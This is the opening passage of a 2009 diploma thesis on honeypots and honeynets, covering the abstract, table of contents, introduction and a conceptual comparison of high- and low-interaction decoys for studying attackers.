Using Honeypots to Capture and Analyze Malicious Activities on the

Transcription

Using Honeypots to Capture and Analyze
Malicious Activities on the Internet
A Diploma Thesis by Stefan Vömel
August 2009
First Examiner:
Prof. Dr.-Ing. Felix C. Freiling
Second Examiner: Prof. Dr.-Ing. Wolfgang Effelsberg
Advisor:
Dr. Thorsten Holz
Ehrenwörtliche Erklärung
Hiermit versichere ich, die vorliegende Diplomarbeit ohne Hilfe Dritter und nur mit
den angegebenen Quellen und Hilfsmitteln angefertigt zu haben. Alle Stellen, die aus
den Quellen entnommen wurden, sind als solche kenntlich gemacht worden. Diese Arbeit
hat in gleicher oder ähnlicher Form noch keiner Prüfungsbehörde vorgelegen.
Mannheim, im August 2009
Stefan Vömel
Abstract
A honeypot is “an information system resource whose value lies in unauthorized or illicit use
of this resource” (see Spitzner, 2003g,a). It is intentionally designed insecurely and serves as an
electronic bait to study the behavior of adversaries or protect an organization against Internet
threats. Due to these characteristics, a honeypot complements traditional, more defenseoriented solutions such as firewalls or intrusion detection systems. However, the technology is
also challenging: On the one hand, setting up a decoy can be a complex and time-consuming
task. On the other hand, a compromised honeypot may pose a significant risk to unaffected
third parties if the activities of the intruder are not properly anticipated.
In the scope of this thesis, we illustrate the development process of so-called Live CD that
implements a pre-configured, fully working electronic bait. With the help of our CD, numerous
honeypots can be easily deployed within a short amount of time. The decoys are executed in
a secured environment and, thus, can safely capture system probes and penetration attempts,
particularly by self spreading worms, viruses, and other types of autonomously propagating
malware.
In the second part of this thesis, we present the architecture of our own honeynet, i.e., a
specially monitored and controlled network of electronic baits. A honeynet facilitates collecting
more extensive and expressive information about computer criminals. Thereby, we are able to
gain a deep insight into the underground community and better understand the tools, tactics,
and motives of attackers.
Zusammenfassung
Ein Honeypot ist eine Informations-Systemressource, deren Wert in der unerlaubten oder
rechtswidrigen Nutzung dieser Ressource liegt (vgl. Spitzner, 2003g,a). Als bewusst unsicher
aufgebauter elektronischer Köder“ ermöglicht sie eine Verhaltensstudie böswilliger Angreifer
”
oder die Erkennung potentieller Gefahren aus dem Internet. Aufgrund dieser Merkmale kann
ein Honeypot auch zum indirekten Schutz von Unternehmen eingesetzt werden und ergänzt
klassische, verteidigungsorientiertere Sicherheitslösungen wie Firewalls oder Frühwarnsysteme.
Der Einsatz eines elektronischen Köders ist jedoch mit gewisen Herausforderungen verbunden: Einerseits kann sein Aufbau aufwendig und zeitintensiv sein. Andererseits stellt ein kompromittierter Honeypot möglicherweise ein erhebliches Risiko für unbeteiligte dritte Parteien
dar, sofern den Aktivitäten des Angreifers nicht ausreichend entgegen gewirkt wird.
Im Rahmen dieser Diplomarbeit stellen wir deshalb eine sogenannte Live CD vor, mit deren
Hilfe vorkonfigurierte, voll funktionsfähige Köder innerhalb einer kurzen Zeit aufgestellt werden können. Da die Systeme in einer abgesicherten Umgebung ausgeführt werden, ist die
Beobachtung und Aufzeichnung von Einbruchsversuchen, vor allem durch selbstverbreitende
Würmer, Viren und andere Schadprogramme, gefahrlos durchführbar.
Im zweiten Teil dieser Arbeit veranschaulichen wir die Architektur eines Honeynets, d.h.,
eines speziell überwachten und kontrollierten Netzwerkes einzelner elektronischer Köder. Ein
Honeynet erleichert eine umfangreichere und aussagekräftigere Sammlung von Informationen
über Computerkriminelle. Dadurch sind wir in der Lage, einen umfassenden Einblick in eine
Untergrundbewegung des Internets zu gewinnen und die Werkzeuge, Taktiken und Motive der
Angreifer besser zu verstehen.
Contents
1 Introduction
1
2 Honeypot Technology
2.1 Introduction to Honeypots . . . . . . . .
2.2 High-Interaction Honeypots . . . . . . .
2.3 Low-Interaction Honeypots . . . . . . . .
2.4 Example of an Advanced Low-Interaction
2.5 Deployment Options for Honeypots . . .
2.6 Summary . . . . . . . . . . . . . . . . .
. . . . . .
. . . . . .
. . . . . .
Honeypot
. . . . . .
. . . . . .
3 Honeynet Technology
3.1 Historical Implementations of Honeynets . . . .
3.2 GenII Honeynets . . . . . . . . . . . . . . . . .
3.2.1 Data Control Implementations . . . . . .
3.2.2 Data Capture Implementations . . . . .
3.3 GenIII Honeynets . . . . . . . . . . . . . . . . .
3.4 Virtual Honeynets and Future Implementations
3.5 Summary . . . . . . . . . . . . . . . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
4 Development of a Live CD-Based Honeypot
4.1 Overview about Popular Live CD Distributions . . . . . . . . . .
4.2 Selection Model for the Live CD Distributions . . . . . . . . . . .
4.2.1 Overview about the Decision Attributes . . . . . . . . . .
4.2.2 Calculation of the Decision Weights . . . . . . . . . . . . .
4.2.3 Overview about the Scoring Model . . . . . . . . . . . . .
4.2.4 Selection of an Adequate Candidate CD . . . . . . . . . .
4.2.5 Summary of the Methodology . . . . . . . . . . . . . . . .
4.3 Development and Remastering Process of the Live CD . . . . . .
4.3.1 Technical Architecture of Slax . . . . . . . . . . . . . . . .
4.3.2 Project Specifications for the Live CD . . . . . . . . . . .
4.3.3 Illustration of the Remastering Process of the Live CD . .
4.3.4 Capturing Autonomously Spreading Malware with the Live
4.3.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . .
i
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
. . .
. . .
. . .
. . .
. . .
. . .
. . .
. . .
. . .
. . .
. . .
CD
. . .
.
.
.
.
.
.
4
5
5
6
8
11
14
.
.
.
.
.
.
.
16
18
19
20
25
30
33
35
.
.
.
.
.
.
.
.
.
.
.
.
.
37
38
40
41
42
42
43
46
46
46
50
53
74
77
Contents
5 Implementation, Deployment, and Analysis of a Honeynet
5.1 Overview about the Architecture of the Honeynet and the System
ronment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5.1.1 Technical Specification of the Honeypots . . . . . . . . . .
5.1.2 Deployment of the Honeywall . . . . . . . . . . . . . . . .
5.1.3 Preparation of the System Environment . . . . . . . . . .
5.1.4 Summary of the Implementation and Deployment Process
5.2 Overview about the Collected Honeynet Data . . . . . . . . . . .
5.2.1 Interactions with the Honeynet . . . . . . . . . . . . . . .
5.2.2 Common Attacks on the Honeynet . . . . . . . . . . . . .
5.3 Selected Attacks on the Honeynet . . . . . . . . . . . . . . . . . .
5.3.1 Attack on the Microsoft Windows Honeypot . . . . . . . .
5.3.2 Attack on the Linux Honeypot . . . . . . . . . . . . . . . .
5.4 Analysis of an Underground Communication Channel . . . . . . .
5.4.1 Overview about the Captured Data . . . . . . . . . . . . .
5.4.2 Analysis of the Labeled Data . . . . . . . . . . . . . . . .
5.4.3 Classification of the Entire Text Corpora . . . . . . . . . .
5.4.4 Noticeable Characteristics of the Underground Market . .
5.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
79
Envi. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
. . . .
80
81
85
89
96
98
98
100
110
110
124
135
136
137
142
145
147
6 Synopsis and Conclusion
148
A Configuration Script for the Nepenthes Honeypot
151
B Boot Options of the Live CD
153
References
155
ii
List of Figures
2.1
2.2
2.3
2.4
2.5
User Interface of the Low-Interaction Honeypot Specter . . . . .
Architecture of the Low-Interaction Honeypot nepenthes . . . .
Setup and Architecture of a Virtual Honeypot . . . . . . . . . .
Architecture of User-Mode Linux . . . . . . . . . . . . . . . . .
Illustration of the Bridged Networking Functionality in VMWare
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
8
9
12
13
14
3.1
3.2
3.3
3.4
3.5
3.6
3.7
3.8
3.9
3.10
Overview about the Honeynet Architecture . . . . . . . . . . .
Architecture of a GenI Honeynet . . . . . . . . . . . . . . . .
Architecture of a GenII Honeynet . . . . . . . . . . . . . . . .
Network Filtering Capabilities of the Honeynet Gateway . . .
Illustration of a Full and a Half-Open TCP Handshake . . . .
Packet Drop Mode (PDM) of Snort Inline . . . . . . . . . . .
Redirection of System Calls in the Sebek Monitoring Software
Covert Data Channel Used by the Sebek Monitoring Software .
Example of a Hybrid Virtual Honeynet . . . . . . . . . . . . .
Example of a Distributed Honeynet . . . . . . . . . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
17
19
20
21
23
24
29
29
33
34
4.1
4.2
4.3
4.4
4.5
4.6
4.7
4.8
4.9
4.10
4.11
4.12
4.13
4.14
4.15
4.16
4.17
4.18
Selection Process for the Live CD Distributions . . . . . . . . . . .
Example of an Ordinal Rating Scale . . . . . . . . . . . . . . . . . .
Boot Sequence of the Slax Live CD . . . . . . . . . . . . . . . . . .
Illustration of the Union File System . . . . . . . . . . . . . . . . .
Functionality of the Live CD-Based Honeypot . . . . . . . . . . . .
Overview about the Remastering Process . . . . . . . . . . . . . . .
Illustration of the GNU Configure and Build System . . . . . . . . .
Directory Structure of the Secured Live CD Environment . . . . . .
Honeypot Configuration Interface of the Live CD . . . . . . . . . .
Architecture of the Notification System on the Live CD . . . . . . .
Overview about the Recompilation Process of the Kernel . . . . . .
Two-Factor Authentication Process of the SSH Service . . . . . . .
Components of the KDE Platform . . . . . . . . . . . . . . . . . . .
User Interface of the Live CD . . . . . . . . . . . . . . . . . . . . .
Origin and Intensity of Malware Attacks . . . . . . . . . . . . . . .
Number of Detected Malware Downloads and Submissions per Day
Detection Rates of 32 Antivirus Vendors . . . . . . . . . . . . . . .
Individual Performance of 32 Antivirus Vendors . . . . . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
40
43
47
49
52
53
57
60
62
63
67
70
72
73
74
75
76
77
iii
.
.
.
.
.
.
.
.
.
.
List of Figures
5.1
5.2
5.3
5.4
5.5
5.6
5.7
5.8
5.9
5.10
5.11
5.12
5.13
5.14
5.15
5.16
5.17
5.18
5.19
5.20
5.21
5.22
5.23
5.24
5.25
5.26
5.27
5.28
5.29
5.30
5.31
5.32
Main Screen of the Walleye Web Management Interface . . . . . . . . . . 88
Overview about the Network Flows from/to the Honeynet . . . . . . . . 89
Example of an Intrusion Attempt on a Honeypot . . . . . . . . . . . . . 89
Example of a Trojaned System Service . . . . . . . . . . . . . . . . . . . 91
Restoring a Captured FTP Session with Wireshark . . . . . . . . . . . . 93
Analyzing Web-Based Attacks with DataEcho . . . . . . . . . . . . . . . 94
System Architecture of the Honeynet . . . . . . . . . . . . . . . . . . . . 97
Origins of Machines Interacting with the Honeynet . . . . . . . . . . . . 99
Classification of Attacks Reported by the Snort Intrusion Detection System100
Request of the DFind Vulnerability Scanner . . . . . . . . . . . . . . . . 101
Geographical Spread of PopUp Spam Attacks . . . . . . . . . . . . . . . 103
Packet Dump of the Slammer Worm . . . . . . . . . . . . . . . . . . . . 104
Origins of Password Brute Force Attacks . . . . . . . . . . . . . . . . . . 105
User Accounts Targeted By Password Brute Force Attacks . . . . . . . . 106
Schematic Overview of a Distributed Denial of Service Attack . . . . . . 107
Number of UDP Packets Captured per Day in the Honeynet . . . . . . . 108
Timeline of a UDP Packet Storm on a Honeypot . . . . . . . . . . . . . . 109
Analysis of a UDP Packet Storm . . . . . . . . . . . . . . . . . . . . . . 109
User Interface of the c99 shell Trojan Backdoor . . . . . . . . . . . . . . 112
Analyzing Encrypted Network Traffic with Wireshark . . . . . . . . . . . 116
Subversion of a System With the Hacker Defender Rootkit . . . . . . . . 117
Custom Login Banner of the Attacker . . . . . . . . . . . . . . . . . . . . 118
Timeline of the Attack on the Windows Honeypot . . . . . . . . . . . . . 120
Flowchart Diagram of the Captured Attack Tools . . . . . . . . . . . . . 129
Timeline of the Attack on the Linux Honeypot . . . . . . . . . . . . . . . 133
Number of Messages Sent per Day to the Communication Channel . . . . 136
Number of Active Users per Day in the Communication Channel . . . . . 137
Distribution of Offers and Requests for Hacking-Related Goods and Services138
Types of Hacking-Related Goods and Services . . . . . . . . . . . . . . . 138
Process of a Machine Learning-Based Text Classification . . . . . . . . . 143
Estimated Distribution of Offers and Requests in the Text Corpora . . . 145
Active Lifetime of Nicks in the Communication Channel . . . . . . . . . 146
iv
List of Tables
2.1
Advantages and Disadvantages of Low-Interaction and High-Interaction
Honeypots . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
15
3.1
3.2
3.3
List of Possible netfilter Actions . . . . . . . . . . . . . . . . . . . . . . .
List of Connection States as Distinguished by IPTables . . . . . . . . . .
Metrics Used by the p0f Passive Fingerprinting Utility . . . . . . . . . .
22
22
32
4.1
4.2
4.3
4.4
4.5
4.6
4.7
4.8
4.9
4.10
4.11
Main Characteristics of Live CD Distributions . . . . . . . . . . . . . . .
Attribute Ranks and Weights for the Candidate CDs . . . . . . . . . . .
Attribute Values for the Candidate CDs . . . . . . . . . . . . . . . . . .
Attribute Ratings and Weighted Sums for the Live CDs . . . . . . . . . .
Weighted Sums for the Live CDs after the Sensitivity Analysis . . . . . .
Base Modules Included in the Slax Live CD . . . . . . . . . . . . . . . .
Custom-Built Modules of the nepenthes Low-Interaction Honeypot . . . .
Dependency Libraries Required for the nepenthes Low-Interaction Honeypot
Overview about the Run Levels of the Operating System . . . . . . . . .
Important User and System-Wide Directories of the KDE Platform . . .
Top Malware Samples Captured with the Live CD . . . . . . . . . . . . .
40
42
44
45
45
50
56
58
68
73
76
5.1
5.2
5.3
5.4
5.5
5.6
5.7
Technical Specification of the Honeypots . . . . . . . . . . . . . . . . . .
Important Configuration Options of the Honeywall . . . . . . . . . . . .
Top 10 Countries Interacting with the Honeynet . . . . . . . . . . . . . .
Origins of PopUp Spam attacks . . . . . . . . . . . . . . . . . . . . . . .
Top 30 Passwords Used During Brute Force Attacks . . . . . . . . . . . .
Countries Involved in Different Distributed Denial of Service Attacks . .
Additional Components of the Serv-U FTP Server that are Required to
Establish a Secured Connection . . . . . . . . . . . . . . . . . . . . . . .
5.8 Attack Tools Used During the Compromise of the Windows Honeypot . .
5.9 Attack Tools Used During the Compromise of the Linux Honeypot . . . .
5.10 Average Precision and Recall Values of the Training Data . . . . . . . . .
v
85
87
99
103
106
108
115
119
132
144
Listings
3.1
3.2
3.3
Sample Rule for the Packet Replace Mode (PRM) of Snort Inline . . . .
Example of a Swatch Configuration File . . . . . . . . . . . . . . . . . . .
Sample Rule of the Snort Intrusion Detection System . . . . . . . . . . .
25
26
27
4.1
4.2
4.3
4.4
4.5
4.6
Preparation of the System Environment . . . . . . . . .
Sample Boot Label of the Isolinux Boot Loader . . . . .
Creating a Kernel Logo for the Live CD . . . . . . . . .
Compiling the Kernel for the Live CD . . . . . . . . . . .
Mounting the Initial Ram to Adapt the linuxrc Start File
Example of a TCP Wrapper Configuration . . . . . . . .
54
64
65
66
67
70
5.1
5.2
Restoring Windows Executables with PEHunter . . . . . . . . . . . . . . 95
Example of a Network Scan for Instances of the phpMyAdmin Database
Administration Program . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
Example of a PopUp Spam Message . . . . . . . . . . . . . . . . . . . . . 102
Manipulation of the System Database . . . . . . . . . . . . . . . . . . . . 111
Installation of the Serv-U FTP Server . . . . . . . . . . . . . . . . . . . . 113
Modification of the System Registry . . . . . . . . . . . . . . . . . . . . . 113
System Hardening Operations on the Compromised Honeypot . . . . . . 114
Extract of Keystrokes Captured by Sebek . . . . . . . . . . . . . . . . . . 125
Setup Script of a Trojaned Secure Shell Server . . . . . . . . . . . . . . . 126
Backdoor Mechanism Implemented in the Secure Shell Server . . . . . . . 126
Exploit for the Webmin and Usermin Web Applications . . . . . . . . . . 130
Sample Advertisement for Hacking-Related Goods . . . . . . . . . . . . . 137
Sample Advertisements and Requests for Stolen Credit Cards and Credit
Card-Related Information . . . . . . . . . . . . . . . . . . . . . . . . . . 139
Sample Advertisements and Requests for Cashiers, Confirmers, and Drops 140
Sample Advertisements and Requests for Bank Logins and Online Accounts140
Sample Advertisements and Requests for Hacked Hosts . . . . . . . . . . 141
Example of a Full Personal Record . . . . . . . . . . . . . . . . . . . . . 142
Sample Advertisements and Requests for Personal Data . . . . . . . . . . 142
Sample Advertisements and Requests for Hardware Equipment . . . . . . 142
Sample Messages Indicating Distrust in Other Market Participants . . . . 146
5.3
5.4
5.5
5.6
5.7
5.8
5.9
5.10
5.11
5.12
5.13
5.14
5.15
5.16
5.17
5.18
5.19
5.20
vi
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
1 Introduction
In the course of slightly less than one and a half decades, the Internet has evolved to
one of the major information and communication platforms: According to a study by
the Miniwatts Marketing Group (2008), the number of Internet users worldwide has
risen from 16 million in 1995 to more than 1.5 billion in 2009. By the year 2010, up to
1.65 billion people are expected to browse web pages, read e-mail, visit chat rooms, and
participate in online discussion forums.
In parallel, the commercial role of the World Wide Web (WWW), as the Internet is
also frequently called (cmp. Tanenbaum, 2003), has become more and more important
as well: For instance, solely in Germany, remedies in electronic commerce have more
than doubled to 438 billion euros within a period of three years (see Pols, 2007), and
almost one out of three Europeans have ordered goods or services online in the last
twelve months (see Eurostats, 2008).
Unfortunately, with the increasing use and financial importance of the Internet, computer systems and network architectures have become valuable targets for cyber criminals, too. Human miscreants as well as automated viruses, worms, and other types of
autonomously propagating malware attempt to exploit vulnerabilities in system platforms and software applications in order to get in control of the underlying machine.
At the time of this writing, more than 44,000 security weaknesses have been discovered
(see CERT, 2009). What is worse, as a survey by the Computer Security Institute (CSI)
shows, 43% of the interviewed business organizations have already fallen prey to an attack (Richardson, 2008, p. 13-16). On average, the respondents suffered a loss of almost
$290,000.
To keep up with current and future threats, a large part of corporations consider security as one of the top goals in the information technology (IT) sector (cmp. Capgemini,
2008). To a great degree, however, implementations are based on traditional, purely
defense-oriented technologies, e.g., firewalls, intrusion detection systems (IDSs), and encryption routines (see Honeynet Project, 2006). The main objective of these approaches
is to recognize malicious activities in time and protect the infrastructure of the enterprise as best as possible. Getting to know the tools, tactics, and motives of intruders
is of lesser priority. As a result, the role of administrators is restricted to reaction,
and blackhats succeed in gaining informational advantages in the long term (cmp. Honeynet Project, 2004b). For this reason, IT professionals have also begun to emphasize
pro-active measures more recently and suggested deploying so-called honeypots.
Honeypots are closely watched electronic baits and are intentionally designed insecurely. Forming potentially attractive targets, attackers are lured into a trap when they
1
1 Introduction
try to compromise a machine: While breaking in the decoy, all their actions are recorded
and analyzed. Thus, it is possible to learn the offensive techniques of adversaries in detail, develop appropriate counter-strategies, and prevent similar system penetrations in
the future (cmp. Spitzner, 2001a).
Outline of the Thesis
This thesis is outlined as follows: In Chapter 2, we introduce the concept of honeypots
in detail. We illustrate the fundamental characteristics of different types of decoys and
depict their respective advantages and disadvantages. Furthermore, we briefly describe
common deployment approaches for electronic baits that have proven useful in practice
for capturing malicious activities.
As we will see, multiple honeypots may be combined in a so-called honeynet to observe attacks not only on a single system, but on a network-wide scope. Even though
this procedure may help creating more accurate profiles of adversaries, we also need to
implement sophisticated control and monitoring facilities in order to mitigate risks for
uninvolved third parties as best as possible. We give an overview about these activities
as well as about historical, modern, and future honeynet technologies in Chapter 3.
At the time of this writing, deploying larger numbers of electronic baits can be a
complex and time-consuming task (see also Sadasivam et al., 2005). For this reason,
we develop a bootable Live CD that completely runs in memory and comprises a preconfigured, working honeypot. The development and evaluation process of the device
is subject of Chapter 4. With the help of our CD, numerous decoys may be easily and
comfortably connected to the Internet within a short amount of time. Thereby, we are
able to collect threats such as autonomously propagating worms and viruses on a large
scale.
In addition, we set up several machines that offer access to full-featured operating
systems, services, and applications. Since the individual components contain certain,
well-known security weaknesses, the machines form attractive targets, particularly for
human miscreants. A selection of specific attacks that we have witnessed in the course
of this thesis is presented in Chapter 5. We conclude with a short summary of our work
in Chapter 6 and propose various opportunities for future research.
Results of the Thesis
As we have already indicated, with our Live CD that we have developed in the course
of the thesis, we may significantly facilitate the configuration and deployment process
of electronic baits. Security professionals are able to connect a fully working decoy to
the Internet and start monitoring probes and compromises within minutes.
Each threat that is captured with the CD is automatically sent to a central analysis
station for further investigation. Reports that are generated by the station may help
assess the potential risk on the Internet that is caused by common worms, viruses, and
2
1 Introduction
other types of autonomously spreading malware. Moreover, the collected samples may
be used to evaluate the performance of virus scanners and similar security-related software products. In our preliminary test with more than 1,000 unique malicious binaries,
detection rates of different anti-virus vendors turned out to partially vary dramatically.
In addition, we have deployed as well as maintained a small honeynet with three
electronic baits over a period of slightly more than five months. During this time, we
have captured more than 21.5 Gb of raw network traffic and monitored a large number
of probes and penetration attempts on the individual decoys.
After examining the incidents in detail, we illustrate typical attack strategies security
professionals are likely to be confronted with in practice as well. Furthermore, we present
two selected compromises of a Linux- and Windows-based honeypot and outline the
tools, tactics, and motives of the intruders. Thereby, we are able to catch a glimpse on
the underground community and gain a better understanding of adversaries operating
in cyberspace to date.
Acknowledgements
First and foremost, I would like to thank Prof. Dr. Felix Freiling for giving me the
opportunity to work in the field of IT security at the Laboratory for Dependable Distributed Systems, University of Mannheim. I would also like to express my deepest
gratitude to my advisor, Dr. Thorsten Holz. He always gave me valuable advice and
feedback, indicated new research directions, and did not leave any of my questions unanswered.
Many thanks go to Johannes Stüttgen as well. Without his assistance, I would not have
been able to deploy my Live CD and start capturing autonomously spreading malware.
The same holds true for Viviana Nichica who was irreplaceable while translating the
source code of several Romanian attack tools.
Acknowledgments are also owed to Jürgen Jaap for providing me with the necessary
hardware equipment and Ben Stock for setting up my personal interface to the analysis
station.
In addition, I greatly benefited from the dedication of the members of the Honeynet
Project. In particular, I appreciate the support of Robert McMillen and Earl Sammons.
Last but not least, I would like to say thank you to Nicholas Chantler for sending me
his PhD thesis and helping me gain an insight in the mind of adversaries.
3
As we have indicated in the introduction of this thesis, especially business corporations focus on traditional, defense-oriented techniques in order to protect their resources
from threats on the Internet. For example, administrators frequently deploy firewalls,
intrusion detection systems (IDS), and intrusion prevention systems (IPS) to identify
suspicious activities at the network perimeter (cmp. Deloitte, 2009). With the help of
signatures, patterns for well-known attacks, the devices are able to discover a broad
category of penetration attempts (see Paxson, 1998). Many implementations also look
for anomalies in network data and attempt recognizing unusual traffic flows that are
potential signs of an incident (see Barford et al., 2002; Leckie and Kotagiri, 2002; Jung
et al., 2004).
In spite of these benefits, Richardson (2008, p. 17) argues that the “measures that
organizations have taken against their attackers (...) are fundamentally imperfect”. For
instance, both intrusion detection as well as intrusion prevention systems suffer from
several inherent problems: First, the systems generate a significant amount of false
positives, i.e., legitimate traffic is erroneously reported as being malicious (see Zhang and
Leckie, 2006). Due to this misclassification, false positives are a serious issue as “they
diminish the value and urgency of real alerts” (see Timm, 2001). What is worse, said
technologies also have difficulties in reliably detecting specific types of probes and attacks
(see Levchenko et al., 2004) or may even be completely circumvented (see Handley et al.,
2001; Chung et al., 1995; Ptacek and Newsham, 1998; Wagner and Soto, 2002).
To properly cope with these factors, IT professionals have recently started to propose
the use of electronic baits in addition to more conventional methods of combatting
computer crime. The characteristics of these so-called honeypots are presented in detail
in the following sections.
Outline of the Chapter
In Section 2.1, we introduce the concept of honeypots, outline their value, and illustrate their field of application. As we will see, we may distinguish two basic types of
electronic baits. Their individual advantages and disadvantages are explained in Section
2.2 and 2.3, followed by a brief description of a particularly powerful decoy that is capable of capturing self propagating worms, viruses, and other malicious software programs
on a large scale. Last but not least, we sketch two common deployment options for
honeypots and conclude with a short summary of our findings.
4
2.1 Introduction to Honeypots
In compliance with the original posting on the honeypot mailing list, we define a honeypot as “an information system resource whose value lies in unauthorized or illicit use
of that resource” (see Spitzner, 2003g,a). It acts as an electronic bait for computer
criminals that is intentionally designed to be probed, attacked, and compromised (see
Spitzner, 2002).
It is important to note that, according to the definition, such a resource may potentially be any digital entity, e.g., a database or a document (cmp. Honeynet Project,
2004b). In the scope of this thesis, we refer to a honeypot as a single computer system
though. Any other resource that serves as a decoy is termed a honeytoken for clarity
purposes (cmp. Spitzner, 2003f).
Honeypots have no production value, i.e., they offer no productive services that are of
interest to legitimate system users (see also Spitzner, 2001a). Consequently, any transactions and interactions with these machines are suspicious and likely reflect unauthorized
or malicious activity. For this reason, data sets collected with a honeypot as well as
the number of encountered false positives are significantly smaller compared to traditional monitoring devices such as IDSs and IPSs. That is why security professionals may
manage and analyze incident-related information more easily (cmp. Honeynet Project,
2004b). In addition, as “any activity with the honeypot is an anomaly”, we can detect
and identify previously unknown intrusion strategies, because “new or unseen attacks
stand out” (see Honeynet Project, 2004b, p. 19). For these purposes, we also record
all traffic flows entering or leaving a decoy with several software applications that are
provided and maintained by members of the Honeynet Project. As we will see in Chapter 5, these applications are extremely powerful and even permit monitoring encrypted
network sessions. Thereby, we are able to recover the steps of adversaries and learn
more about their specific tools, tactics, and motives. This research-oriented approach
facilitates coming to a better understanding of the underground community in the long
term and encourages finding proper countermeasures against miscreants (see Spitzner,
2002). On the other hand, when deployed within a productive environment, honeypots
may help recognize threats in time and protect resources of an organization. Thus, they
directly contribute to the security of an enterprise (cmp. Spitzner, 2001a, 2003e).
Depending on the level of risk that is associated with an electronic bait and the possibilities of interaction, we distinguish high-interaction and low-interaction honeypots.
The major characteristics of these two types are presented in the following.
2.2 High-Interaction Honeypots
High-interaction honeypots are frequently based on commercial off-the-shelf (COTS)
computer systems and offer attackers complete operating systems as well as fully functional applications and services to interact with (cmp. Provos and Holz, 2007). Thus,
5
when this type of electronic bait is compromised, a blackhat may get in entire control
of the machine, upload her own tools, and modify files and system settings. Due to this
unrestricted access and a high level of freedom, security professionals are able to collect
in-depth information about the incident, the intentions of the intruder as well as her motives (cmp. Honeynet Project, 2000b,a). For instance, high-interaction honeypots have
proven useful for studying identity theft-related phishing attacks and automated credit
card frauds in the past (see Watson et al., 2005; Honeynet Project, 2003a). In addition,
as these decoys make “no assumptions on how an attacker will behave” (see Spitzner,
2003a), they are even capable of capturing so-called 0-day exploits, i.e., exploits that
have never been encountered “in the wild” before (cmp. Honeynet Project, 2004b).
However, in spite of these benefits, several aspects must be taken into consideration
before starting to deploy high-interaction honeypots: First, the technology is rather
complex to set up and configure, maintenance can be extremely time-consuming (see
Spitzner, 2002). Second, some efforts have been made in the underground community
more recently to detect the presence of a monitored environment. For example, various
authors succeeded in reliably identifying data capture facilities running on a decoy (see
Corey, 2003, 2004; Dornseif et al., 2004a). Other approaches seek to find anomalies in
the system setup and attempt to distinguish honeypots from real machines (see Holz
and Raynal, 2005b; Provos and Holz, 2007).
When a device has successfully been detected, it is likely adversaries will either completely evade it in the future or insert bogus data in order to pollute log files and make
a later investigation more difficult (see Spitzner, 2004). In this case, its value is dramatically reduced, and “the game is almost over” (see Holz and Raynal, 2005b, p. 30).
Furthermore, because of the inherent open architecture of high-interaction electronic
baits, the external environment is constantly exposed to a certain level of threat (see
Spitzner, 2001b). For example, adversaries may use a compromised decoy as a starting
point for further malicious activities. That is why each honeypot must be carefully
administrated and closely watched in order to mitigate risks for unaffected third parties
as best as possible. Participants of the Honeynet Project have developed a number of
utilities that greatly facilitate the latter tasks. We will give a detailed overview about
these utilities in Chapter 3.
2.3 Low-Interaction Honeypots
The level of risk as described above can be significantly reduced when using low-interaction
honeypots. These electronic baits only emulate specific services, i.e., intruders are tricked
to be interacting with a real machine, while in reality, they operate in a closely watched,
simulated environment (cmp. Spitzner, 2002). For instance, a low-interaction honeypot
may provide a virtual FTP server attackers can connect to. When a session is initiated
and the adversary attempts to log in, her IP address as well as her authentication credentials are recorded for information gathering purposes. Any other additional requests
6
such as uploading or downloading files are, however, rejected (cmp. Spitzner, 2003a).
Thus, in comparison to high-interaction honeypots, the possibilities of interaction are
substantially reduced. Consequently, administrators stay in control of their machine
and do not need to be afraid of a total system compromise. In parallel, the risk for the
external environment is effectively minimized.
Low-interaction honeypots are easy to install, configure, and maintain (see Spitzner,
2002). That is why they may be deployed on a large scale without difficulty. For example, in the course of the Leurre.com project1 , security professionals have started to set
up numerous platforms with several emulated operating systems in different locations
all over the world. Each platform periodically sends their captured data to a central
database. Thereby, it is possible to generate extensive statistics about attack patterns
and trends at a higher level of abstraction, even though the amount of information collected with a single decoy may be quite limited (see Pouget et al., 2005; Holz, 2006).
Similar approaches have been pursued by other authors to examine the spread of autonomously propagating malware on the Internet (see Provos, 2004; Bächer et al., 2006;
Göbel et al., 2006; Itzel, 2007).
On the other hand, due to their simple design, low-interaction honeypots are often
unable to deal with unexpected behavior, i.e., they are not capable of capturing 0-day
exploits or other previously unknown threats. What is worse, they are comparatively
easy to fingerprint: For instance, sophisticated attackers may trigger resource-intensive
operations and examine corresponding response latencies to reveal the true nature of
the decoy (cmp. Provos and Holz, 2007). As we have already explained, the value of the
device highly decreases in this case.
In spite of these disadvantages, low-interaction honeypots are frequently favored within
a productive environment and are particularly popular among organizations in the financial and manufacturing industry (see Honeynet Project, 2004b). The majority of existing
solutions is offered free of charge, e.g., the rather old Deception Toolkit (DTK)2 or the
Tiny Honeypot (thp)3 by George Bakos. Commercial products such as Specter4 usually
permit emulating a larger number of operating systems and services. Their behavior
and appearance can be easily configured and adapted with a comfortable graphical user
